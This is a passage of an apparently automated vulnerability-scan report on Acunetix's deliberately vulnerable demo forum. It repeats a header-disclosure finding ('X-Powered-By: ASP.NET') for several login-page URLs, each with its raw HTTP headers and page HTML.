<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | X-Powered-By: ASP.NET |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:53 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td 